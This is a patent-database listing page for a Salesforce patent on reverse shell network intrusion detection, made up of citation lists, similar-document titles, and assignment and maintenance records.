US6724399B1 (en) 2001-09-28 2004-04-20 Siebel Systems, Inc. Methods and apparatus for enabling keyboard accelerators in applications implemented via a browser
US6993712B2 (en) 2001-09-28 2006-01-31 Siebel Systems, Inc. System and method for facilitating user interaction in a browser environment
US6978445B2 (en) 2001-09-28 2005-12-20 Siebel Systems, Inc. Method and system for supporting user navigation in a browser environment
US7761535B2 (en) 2001-09-28 2010-07-20 Siebel Systems, Inc. Method and system for server synchronization with a computing device
US7146617B2 (en) 2001-09-29 2006-12-05 Siebel Systems, Inc. Method, apparatus, and system for implementing view caching in a framework to support web-based applications
US6901595B2 (en) 2001-09-29 2005-05-31 Siebel Systems, Inc. Method, apparatus, and system for implementing a framework to support a web-based application
US8359335B2 (en) 2001-09-29 2013-01-22 Siebel Systems, Inc. Computing system and method to implicitly commit unsaved data for a world wide web application
US7962565B2 (en) 2001-09-29 2011-06-14 Siebel Systems, Inc. Method, apparatus and system for a mobile web client
US7289949B2 (en) 2001-10-09 2007-10-30 Right Now Technologies, Inc. Method for routing electronic correspondence based on the level and type of emotion contained therein
US7062502B1 (en) 2001-12-28 2006-06-13 Kesler John N Automated generation of dynamic data entry user interface for relational database management systems
US6804330B1 (en) 2002-01-04 2004-10-12 Siebel Systems, Inc. Method and system for accessing CRM data via voice
US7058890B2 (en) 2002-02-13 2006-06-06 Siebel Systems, Inc. Method and system for enabling connectivity to a data system
US7131071B2 (en) 2002-03-29 2006-10-31 Siebel Systems, Inc. Defining an approval process for requests for approval
US7672853B2 (en) 2002-03-29 2010-03-02 Siebel Systems, Inc. User interface for processing requests for approval
US6850949B2 (en) 2002-06-03 2005-02-01 Right Now Technologies, Inc. System and method for generating a dynamic interface via a communications network
US8639542B2 (en) 2002-06-27 2014-01-28 Siebel Systems, Inc. Method and apparatus to facilitate development of a customer-specific business process model
US7594181B2 (en) 2002-06-27 2009-09-22 Siebel Systems, Inc. Prototyping graphical user interfaces
US7437720B2 (en) 2002-06-27 2008-10-14 Siebel Systems, Inc. Efficient high-interactivity user interface for client-server applications
US20040010489A1 (en) 2002-07-12 2004-01-15 Rightnow Technologies, Inc. Method for providing search-specific web pages in a network computing environment
US7251787B2 (en) 2002-08-28 2007-07-31 Siebel Systems, Inc. Method and apparatus for an integrated process modeller
US7069497B1 (en) 2002-09-10 2006-06-27 Oracle International Corp. System and method for applying a partial page change
US9448860B2 (en) 2003-03-21 2016-09-20 Oracle America, Inc. Method and architecture for providing data-change alerts to external applications via a push service
US7904340B2 (en) 2003-03-24 2011-03-08 Siebel Systems, Inc. Methods and computer-readable medium for defining a product model
US7406501B2 (en) 2003-03-24 2008-07-29 Yahoo! Inc. System and method for instant messaging using an e-mail protocol
US7287041B2 (en) 2003-03-24 2007-10-23 Siebel Systems, Inc. Data modeling using custom data types
US7711680B2 (en) 2003-03-24 2010-05-04 Siebel Systems, Inc. Common common object
US8762415B2 (en) 2003-03-25 2014-06-24 Siebel Systems, Inc. Modeling of order data
US7685515B2 (en) 2003-04-04 2010-03-23 Netsuite, Inc. Facilitating data manipulation in a browser-based user interface of an enterprise business application
US7412455B2 (en) 2003-04-30 2008-08-12 Dillon David M Software framework that facilitates design and implementation of database applications
US7620655B2 (en) 2003-05-07 2009-11-17 Enecto Ab Method, device and computer program product for identifying visitors of websites
US7409336B2 (en) 2003-06-19 2008-08-05 Siebel Systems, Inc. Method and system for searching data based on identified subset of categories and relevance-scored text representation-category combinations
US20040260659A1 (en) 2003-06-23 2004-12-23 Len Chan Function space reservation system
US7237227B2 (en) 2003-06-30 2007-06-26 Siebel Systems, Inc. Application user interface template with free-form layout
US7694314B2 (en) 2003-08-28 2010-04-06 Siebel Systems, Inc. Universal application network architecture
US7779039B2 (en) 2004-04-02 2010-08-17 Salesforce.Com, Inc. Custom entities and fields in a multi-tenant database system
US7269590B2 (en) 2004-01-29 2007-09-11 Yahoo! Inc. Method and system for customizing views of information associated with a social network user
US7289976B2 (en) 2004-12-23 2007-10-30 Microsoft Corporation Easy-to-use data report specification
US7747648B1 (en) 2005-02-14 2010-06-29 Yahoo! Inc. World modeling using a relationship network with communication channels to entities
US7945653B2 (en) 2006-10-11 2011-05-17 Facebook, Inc. Tagging digital media
US7827208B2 (en) 2006-08-11 2010-11-02 Facebook, Inc. Generating a feed of stories personalized for members of a social network
US8209308B2 (en) 2006-05-01 2012-06-26 Rueben Steven L Method for presentation of revisions of an electronic document
US9135228B2 (en) 2006-05-01 2015-09-15 Domo, Inc. Presentation of document history in a web browsing application
US8566301B2 (en) 2006-05-01 2013-10-22 Steven L. Rueben Document revisions in a collaborative computing environment
US7853881B1 (en) 2006-07-03 2010-12-14 ISQ Online Multi-user on-line real-time virtual social networks based upon communities of interest for entertainment, information or e-commerce purposes
US7779475B2 (en) 2006-07-31 2010-08-17 Petnote Llc Software-based method for gaining privacy by affecting the screen of a computing device
US8095531B2 (en) 2006-10-03 2012-01-10 Salesforce.Com, Inc. Methods and systems for controlling access to custom objects in a database
US7730478B2 (en) 2006-10-04 2010-06-01 Salesforce.Com, Inc. Method and system for allowing access to developed applications via a multi-tenant on-demand database service
US8082301B2 (en) 2006-11-10 2011-12-20 Virtual Agility, Inc. System for supporting collaborative activity
US8954500B2 (en) 2008-01-04 2015-02-10 Yahoo! Inc. Identifying and employing social network relationships
US8073850B1 (en) 2007-01-19 2011-12-06 Wordnetworks, Inc. Selecting key phrases for serving contextually relevant content
US8719287B2 (en) 2007-08-31 2014-05-06 Business Objects Software Limited Apparatus and method for dynamically selecting componentized executable instructions at run time
US20090100342A1 (en) 2007-10-12 2009-04-16 Gabriel Jakobson Method and system for presenting address and mapping information
US8504945B2 (en) 2008-02-01 2013-08-06 Gabriel Jakobson Method and system for associating content with map zoom function
US9449333B2 (en) 2008-02-01 2016-09-20 Gabriel Jakobson Online advertising associated with electronic mapping systems
US8490025B2 (en) 2008-02-01 2013-07-16 Gabriel Jakobson Displaying content associated with electronic mapping systems
US8032297B2 (en) 2008-05-08 2011-10-04 Gabriel Jakobson Method and system for displaying navigation information on an electronic map
US8014943B2 (en) 2008-05-08 2011-09-06 Gabriel Jakobson Method and system for displaying social networking navigation information
US8646103B2 (en) 2008-06-30 2014-02-04 Gabriel Jakobson Method and system for securing online identities
US8510664B2 (en) 2008-09-06 2013-08-13 Steven L. Rueben Method and system for displaying email thread information
US8661056B1 (en) 2008-11-03 2014-02-25 Salesforce.Com, Inc. System, method and computer program product for publicly providing web content of a tenant using a multi-tenant on-demand database service
US8510045B2 (en) 2009-12-22 2013-08-13 Steven L. Rueben Digital maps displaying search-resulting points-of-interest in user delimited regions
US8583587B2 (en) 2010-03-08 2013-11-12 Salesforce.Com, Inc. System, method and computer program product for performing one or more actions utilizing a uniform resource locator
US8925041B2 (en) 2010-04-01 2014-12-30 Salesforce.Com, Inc. System, method and computer program product for performing one or more actions based on a determined access permissions for a plurality of users
US8566654B2 (en) 2010-08-13 2013-10-22 Salesforce.Com, Inc. Debugging site errors by an admin as a guest user in a multi-tenant database environment
US8943002B2 (en) 2012-02-10 2015-01-27 Liveperson, Inc. Analytics driven engagement
US8769004B2 (en) 2012-02-17 2014-07-01 Zebedo Collaborative web browsing system integrated with social networks
US8756275B2 (en) 2012-02-17 2014-06-17 Zebedo Variable speed collaborative web browsing system
US8769017B2 (en) 2012-02-17 2014-07-01 Zebedo Collaborative web browsing system having document object model element interaction detection

Patent Citations (19)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US7283565B1 (en) * 2001-12-27 2007-10-16 Cypress Semiconductor Corporation Method and apparatus for framing a data packet
US20050081119A1 (en) * 2003-08-08 2005-04-14 Dizoglio Marc Real time data storage monitoring and administration
US20050157662A1 (en) * 2004-01-20 2005-07-21 Justin Bingham Systems and methods for detecting a compromised network
US20060021031A1 (en) * 2004-06-30 2006-01-26 Scott Leahy Method and system for preventing fraudulent activities
US8151348B1 (en) * 2004-06-30 2012-04-03 Cisco Technology, Inc. Automatic detection of reverse tunnels
US20060031928A1 (en) * 2004-08-09 2006-02-09 Conley James W Detector and computerized method for determining an occurrence of tunneling activity
US8869268B1 (en) * 2007-10-24 2014-10-21 Symantec Corporation Method and apparatus for disrupting the command and control infrastructure of hostile programs
US8620874B1 (en) * 2008-06-10 2013-12-31 Netapp, Inc. Application recovery from network-induced data corruption
US20130117205A1 (en) * 2010-03-17 2013-05-09 Thales Method of identifying a protocol giving rise to a data flow
US20150058916A1 (en) * 2011-08-31 2015-02-26 Palo Alto Networks, Inc. Detecting encrypted tunneling traffic
US20140115705A1 (en) * 2012-10-22 2014-04-24 Fujitsu Limited Method for detecting illegal connection and network monitoring apparatus
US20150326600A1 (en) * 2013-12-17 2015-11-12 George KARABATIS Flow-based system and method for detecting cyber-attacks utilizing contextual information
US20170223032A1 (en) * 2014-02-28 2017-08-03 British Telecommunications Public Limited Company Malicious encrypted traffic inhibitor
US20150326592A1 (en) * 2014-05-07 2015-11-12 Attivo Networks Inc. Emulating shellcode attacks
US20160057167A1 (en) * 2014-08-21 2016-02-25 Salesforce.Com, Inc. Phishing and threat detection and prevention
US20160338120A1 (en) * 2015-05-14 2016-11-17 Smart Technologies, Ulc System And Method Of Communicating Between Interactive Systems
US20160359887A1 (en) * 2015-06-04 2016-12-08 Cisco Technology, Inc. Domain name system (dns) based anomaly detection
US20160381051A1 (en) * 2015-06-27 2016-12-29 Mcafee, Inc. Detection of malware
US20170034192A1 (en) * 2015-07-28 2017-02-02 Sap Se Contextual monitoring and tracking of ssh sessions

Cited By (14)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20180077201A1 (en) * 2016-09-15 2018-03-15 Paypal, Inc. Enhanced Security Techniques for Remote Reverse Shell Prevention
US10666618B2 (en) * 2016-09-15 2020-05-26 Paypal, Inc. Enhanced security techniques for remote reverse shell prevention
US20180255076A1 (en) * 2017-03-02 2018-09-06 ResponSight Pty Ltd System and Method for Cyber Security Threat Detection
US20220353282A1 (en) * 2017-03-02 2022-11-03 ResponSight Pty Ltd System and Method for Cyber Security Threat Detection
US10701089B2 (en) 2017-03-02 2020-06-30 ResponSight Pty Ltd System and method for cyber security threat detection
US10728261B2 (en) 2017-03-02 2020-07-28 ResponSight Pty Ltd System and method for cyber security threat detection
US20210176211A1 (en) * 2017-03-23 2021-06-10 Pismo Labs Technology Limited Method and system for restricting transmission of data traffic for devices with networking capabilities
US11722458B2 (en) * 2017-03-23 2023-08-08 Pismo Labs Technology Limited Method and system for restricting transmission of data traffic for devices with networking capabilities
CN111049781A (en) * 2018-10-12 2020-04-21 北京奇虎科技有限公司 A method, device, device and storage medium for detecting a rebound network attack
US11489849B2 (en) 2020-01-14 2022-11-01 Saudi Arabian Oil Company Method and system for detecting and remediating malicious code in a computer network
CN113515743A (en) * 2021-03-23 2021-10-19 杭州安恒信息技术股份有限公司 Identification method and device of call chain of rebound shell process and electronic device
CN114064981A (en) * 2021-11-17 2022-02-18 北京安天网络安全技术有限公司 Reverse shell process detection method and device, electronic equipment, computer storage medium and program product
US20230328045A1 (en) * 2022-04-08 2023-10-12 Xilinx, Inc. Secure shell and role isolation for multi-tenant compute
CN117201072A (en) * 2023-07-31 2023-12-08 北京天融信网络安全技术有限公司 User password acquisition method, device, equipment and storage medium

Also Published As

Publication number Publication date
US10135847B2 (en) 2018-11-20

Similar Documents

Publication Publication Date Title
US10135847B2 (en) Reverse shell network intrusion detection
US11171925B2 (en) Evaluating and modifying countermeasures based on aggregate transaction status
US9787714B2 (en) Phishing and threat detection and prevention
US20240073245A1 (en) Metadata-based detection and prevention of phishing attacks
US10178156B2 (en) Extraction and capture of information from customizable header
US8776082B2 (en) Method and system for providing a client access to an external service via an application services platform
US9736260B2 (en) Redirecting from a cloud service to a third party website to save costs without sacrificing security
US10091165B2 (en) Methods and systems for providing context-based outbound processing application firewalls
US8776083B2 (en) API method and system for providing access to an external service via an application services platform
US8621065B1 (en) Dynamic blocking of suspicious electronic submissions
US12021887B2 (en) Compact logging for cloud and web security
US10536439B2 (en) Client fingerprinting for information system security
US20160036831A1 (en) Web redirection for content filtering
US20170163663A1 (en) False positive detection reduction system for network-based attacks
US11089019B2 (en) Techniques and architectures for secure session usage and logging
US11057324B1 (en) System and method of secure analysis for encrypted electronic mail attachments
US11095448B2 (en) HASSH profiling mechanism
US12155658B2 (en) Multi-tenant two-stage authentication
US12210579B2 (en) High scalable document generation service
US12301605B2 (en) Efficient subordinate request web page logging
US20240250991A1 (en) Systems, methods, and devices for security enhancements in cloud computing environments

Legal Events

Date Code Title Description
AS Assignment

Owner name: SALESFORCE.COM, INC., CALIFORNIA

Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNORS:ALTHOUSE, JOHN BROOKE;SALUSKY, WILLIAM;ATKINSON, JEFFERY S.;SIGNING DATES FROM 20160509 TO 20160511;REEL/FRAME:038638/0918

STCF Information on status: patent grant

Free format text: PATENTED CASE

MAFP Maintenance fee payment

Free format text: PAYMENT OF MAINTENANCE FEE, 4TH YEAR, LARGE ENTITY (ORIGINAL EVENT CODE: M1551); ENTITY STATUS OF PATENT OWNER: LARGE ENTITY

Year of fee payment: 4

AS Assignment

Owner name: SALESFORCE, INC., CALIFORNIA

Free format text: CHANGE OF NAME;ASSIGNOR:SALESFORCE.COM, INC.;REEL/FRAME:069431/0007

Effective date: 20220325

点击 这是indexloc提供的php浏览器服务,不要输入任何密码和下载